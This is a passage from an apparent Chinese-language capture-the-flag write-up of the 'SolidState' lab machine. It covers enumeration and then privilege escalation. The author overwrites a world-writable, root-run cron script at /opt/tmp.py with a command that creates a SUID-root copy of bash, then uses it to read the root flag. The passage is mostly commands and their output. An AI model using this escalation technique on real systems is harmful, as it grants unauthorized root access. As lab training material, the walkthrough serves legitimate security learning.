drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 icc
drwx------ 2 james osboxes 4096 Aug 22 2017 keyrings
drwx------ 2 james osboxes 4096 Jun 18 2017 sounds
drwx------ 3 james osboxes 4096 Jun 18 2017 telepathy
drwxr-xr-x 3 james osboxes 4096 Jun 18 2017 tracker
drwxr-xr-x 2 james osboxes 4096 Aug 22 2017 xorg
ls: cannot open directory './.local/share/applications': Permission denied
ls: cannot open directory './.local/share/evolution': Permission denied
./.local/share/folks:
total 8
drwxr-xr-x 2 james osboxes 4096 Aug 22 2017 .
drwxr-xr-x 14 james osboxes 4096 Aug 22 2017 ..
-rw------- 1 james osboxes 0 Aug 22 2017 relationships.ini
./.local/share/gnome-settings-daemon:
total 8
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 .
drwxr-xr-x 14 james osboxes 4096 Aug 22 2017 ..
-rw-r--r-- 1 james osboxes 0 Jun 18 2017 input-sources-converted
ls: cannot open directory './.local/share/gnome-shell': Permission denied
ls: cannot open directory './.local/share/gvfs-metadata': Permission denied
./.local/share/icc:
total 8
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 .
drwxr-xr-x 14 james osboxes 4096 Aug 22 2017 ..
ls: cannot open directory './.local/share/keyrings': Permission denied
ls: cannot open directory './.local/share/sounds': Permission denied
ls: cannot open directory './.local/share/telepathy': Permission denied
./.local/share/tracker:
total 12
drwxr-xr-x 3 james osboxes 4096 Jun 18 2017 .
drwxr-xr-x 14 james osboxes 4096 Aug 22 2017 ..
drwxr-xr-x 2 james osboxes 4096 Aug 22 2017 data
./.local/share/tracker/data:
total 220
drwxr-xr-x 2 james osboxes 4096 Aug 22 2017 .
drwxr-xr-x 3 james osboxes 4096 Jun 18 2017 ..
-rw-r----- 1 james osboxes 139096 Aug 22 2017 tracker-store.journal
-rw-r----- 1 james osboxes 74725 Jun 18 2017 tracker-store.ontology.journal
./.local/share/xorg:
total 56
drwxr-xr-x 2 james osboxes 4096 Aug 22 2017 .
drwxr-xr-x 14 james osboxes 4096 Aug 22 2017 ..
-rw-r--r-- 1 james osboxes 21679 Aug 22 2017 Xorg.0.log
-rw-r--r-- 1 james osboxes 21678 Jun 18 2017 Xorg.0.log.old
./Music:
total 8
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22 2017 ..
./.nano:
total 8
drwxr-xr-x 2 james osboxes 4096 Aug 22 2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22 2017 ..
./Pictures:
total 8
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22 2017 ..
./Public:
total 8
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22 2017 ..
ls: cannot open directory './.ssh': Permission denied
./Templates:
total 8
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22 2017 ..
./Videos:
total 8
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22 2017 ..
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home/james$
使用ls -alR 进行递归搜索,但是也没有可用信息!
提权
1、系统信息收集
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ uname -a
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686 GNU/Linux
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ sudo -l
bash: sudo: command not found
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description: Debian GNU/Linux 9.0 (stretch)
Release: 9.0
Codename: stretch
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ cat /etc/passwd | grep "home" | grep -v nologin
james:x:1000:1000:james:/home/james/:/bin/bash
mindy:x:1001:1001:mindy:/home/mindy:/bin/rbash
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ ls -al /etc/passwd /etc/shadow
-rw-r--r-- 1 root root 2107 Aug 22 2017 /etc/passwd
-rw-r----- 1 root shadow 1375 Aug 22 2017 /etc/shadow
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g
/bin/umount
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/sbin/pppd
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
2、恶意脚本提取
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ cd opt
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -al
total 16
drwxr-xr-x 3 root root 4096 Aug 22 2017 .
drwxr-xr-x 22 root root 4096 Jun 18 2017 ..
drwxr-xr-x 11 root root 4096 Aug 22 2017 james-2.3.2
-rwxrwxrwx 1 root root 105 Aug 22 2017 tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$
找了一大堆东西,最后我们在opt目录下找到了一个py文件。
看起来是一个 Python 脚本,使用 `os.system` 函数调用 `rm -r /tmp/*` 命令来删除 `/tmp/` 目录下的所有文件和子目录。
如果删除操作失败,脚本将会使用 `sys.exit()` 终止程序。
我们只需要替换脚本需要执行的内容即可!
cp \/bin\/bash \/home\/mindy\/shell;chmod 4777 \/home\/mindy\/shell
不要为了转义。
cp /opt/tmp.py ~/1.py
cat 1.py | sed 's/rm -r \/tmp\/\* /cp \/bin\/bash \/home\/mindy\/shell;chmod 4777 \/home\/mindy\/shell/g' >> 2.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat 2.py
#!/usr/bin/env python
import os
import sys
try:
os.system('cp /bin/bash /home/mindy/shell;chmod 4777 /home/mindy/shell')
except:
sys.exit()
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat 2.py > /opt/tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('cp /bin/bash /home/mindy/shell;chmod 4777 /home/mindy/shell')
except:
sys.exit()
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ cd mindy/
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -al
total 1272
drwxr-x--- 4 mindy mindy 4096 Dec 17 22:51 .
drwxr-xr-x 4 root root 4096 Aug 22 2017 ..
-rwxr-xr-x 1 mindy mindy 105 Dec 17 22:38 1.py
-rw-r--r-- 1 mindy mindy 151 Dec 17 22:48 2.py
-rw-r--r-- 1 root root 0 Aug 22 2017 .bash_history
-rw-r--r-- 1 root root 0 Aug 22 2017 .bash_logout
-rw-r--r-- 1 root root 338 Aug 22 2017 .bash_profile
-rw-r--r-- 1 root root 1001 Aug 22 2017 .bashrc
drwxr-x--- 2 mindy mindy 4096 Aug 22 2017 bin
-rw------- 1 root root 0 Aug 22 2017 .rhosts
-rwsrwxrwx 1 root root 1265272 Dec 17 22:51 shell
-rw------- 1 root root 0 Aug 22 2017 .shosts
drw------- 2 root root 4096 Aug 22 2017 .ssh
-rw------- 1 mindy mindy 34 Aug 22 2017 user.txt
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$
自动执行tmp.py并且成功执行,mindy目录下生成了可执行文件shell。
get root
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ./shell -p
shell-4.4# id
uid=1001(mindy) gid=1001(mindy) euid=0(root) groups=1001(mindy)
shell-4.4# whoami
root
shell-4.4# cd /root
shell-4.4# ls
root.txt
shell-4.4# cat root.txt
b4c9723a28899b1c45db281d99cc87c9
shell-4.4#